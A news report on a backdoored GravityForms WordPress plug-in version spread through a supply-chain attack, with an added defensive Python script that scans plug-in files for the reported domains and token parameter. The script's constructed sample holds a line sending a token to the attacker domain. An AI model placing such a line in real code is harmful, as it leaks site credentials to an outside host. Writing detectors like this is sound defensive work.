GravityForms: WordPress plug-in infected in supply-chain attack
IT researchers have discovered an infected version of the WordPress plug-in GravityForms, which is used millions of times.
(Image: Primakov/Shutterstock.com)
Malicious actors have posted infected versions of the GravityForms plug-in for the WordPress content management system for download on the official website. The manipulated version of the plug-in, which has been installed more than a million times, contains a backdoor that allows attackers to completely compromise the WordPress instance.
According to IT researchers at Patchstack, the person who discovered the malware-infected plug-in downloaded GravityForms from the official website gravityforms.com last Friday. The downloaded plug-in, however, made HTTP requests to the suspicious domain gravityapi.com, which had only been created on Tuesday last week. The request to this domain was so slow that it was noticed by the discoverer's monitoring systems.
Infection apparently not widespread
The analysts contacted several major web hosts and had them search for the Indicators of Compromise (IOCs). It turned out that the infection is not widespread: the backdoored plug-in was only available for a short time and was downloaded by only a few victims. During the investigation, Patchstack discovered that Groundhog is also affected by the supply chain attack. Patchstack does not discuss to what extent supply chain attacks are involved in that case.
The backdoor in the GravityForms plug-in opened up several options for the attackers. For example, they were able to create new accounts with administrator roles, upload arbitrary files to the server, or delete user accounts. On Saturday, Patchstack observed backdoor activity in which the attackers sent an encrypted call to the gf_api_token parameter.
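A defender-side check in the spirit of the IOC search the web hosts ran: the script below walks an installed copy of the plug-in, flags any PHP or JavaScript line that references the domains named in the report or the gf_api_token parameter, and reads the version from the plug-in's header so that the infected version 2.9.12 stands out. This is an added example, not Patchstack's tooling or anything published by the plug-in's developers; it assumes the standard layout in which the plug-in's main file is gravityforms.php with a `Version:` header line, and the two sample plug-in trees it builds in a temporary directory are constructed for the demonstration.

```python
import re
import tempfile
from pathlib import Path

# Indicators taken from the report: the suspicious domains, the request
# parameter used by the backdoor, and the version reported as infected.
IOC_DOMAINS = ("gravityapi.com", "gravityapi.org")
IOC_PARAM = "gf_api_token"
INFECTED_VERSION = "2.9.12"

# Matches a "Version: x.y.z" line in a WordPress plug-in header comment.
VERSION_RE = re.compile(r"^\s*\*?\s*Version:\s*(\S+)", re.MULTILINE)


def plugin_version(plugin_dir):
    """Read the version from the plug-in header (assumed to be gravityforms.php)."""
    main = Path(plugin_dir) / "gravityforms.php"
    if not main.is_file():
        return None
    match = VERSION_RE.search(main.read_text(errors="ignore"))
    return match.group(1) if match else None


def scan_plugin(plugin_dir):
    """Return (relative file, line number, indicator) for every IOC hit in .php/.js files."""
    root = Path(plugin_dir)
    hits = []
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix not in (".php", ".js"):
            continue
        for number, line in enumerate(path.read_text(errors="ignore").splitlines(), 1):
            for ioc in IOC_DOMAINS + (IOC_PARAM,):
                if ioc in line:
                    hits.append((str(path.relative_to(root)), number, ioc))
    return hits


def assess(plugin_dir):
    """Combine the version check and the IOC scan into one verdict."""
    version = plugin_version(plugin_dir)
    hits = scan_plugin(plugin_dir)
    return {
        "version": version,
        "hits": hits,
        "suspicious": bool(hits) or version == INFECTED_VERSION,
    }


def build_sample(plugin_dir, infected):
    """Write a constructed, minimal plug-in tree; the 'infected' variant only
    contains a line referencing the reported domain and parameter."""
    plugin_dir = Path(plugin_dir)
    (plugin_dir / "includes").mkdir(parents=True)
    version = INFECTED_VERSION if infected else "2.9.13"
    (plugin_dir / "gravityforms.php").write_text(
        "<?php\n/*\nPlugin Name: Gravity Forms\nVersion: %s\n*/\n" % version
    )
    body = "<?php\n$resp = wp_remote_get('https://licence.example/check');\n"
    if infected:
        body += "$resp = wp_remote_get('https://gravityapi.org/?gf_api_token=' . $token);\n"
    (plugin_dir / "includes" / "api.php").write_text(body)


def demo():
    """Assess a clean and a constructed infected sample; returns both results."""
    with tempfile.TemporaryDirectory() as tmp:
        clean = Path(tmp) / "clean" / "gravityforms"
        bad = Path(tmp) / "bad" / "gravityforms"
        build_sample(clean, infected=False)
        build_sample(bad, infected=True)
        return assess(clean), assess(bad)


if __name__ == "__main__":
    for label, result in zip(("clean", "infected"), demo()):
        print(label, result)
```

On a real server you would point `assess()` at `wp-content/plugins/gravityforms` instead of the constructed samples; a version match alone is worth treating as a finding, since the first clean replacement was shipped under the same version number.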
The discoverer of the manipulated version also contacted the plug-in's developers at RocketGenius. A little later he received their feedback: version 2.9.12 of the plug-in was infected. The plug-in was replaced by a clean version, initially without raising the version number; the developers did that later on Friday and uploaded version 2.9.13. The domain gravityapi.org has been shut down by the domain registrar Namecheap.
Last week, a vulnerability was discovered in the WordPress plug-in SureForms. Through that flaw, attackers can likewise completely compromise the WordPress instance; the plug-in is used on more than 200,000 websites.
(dmk)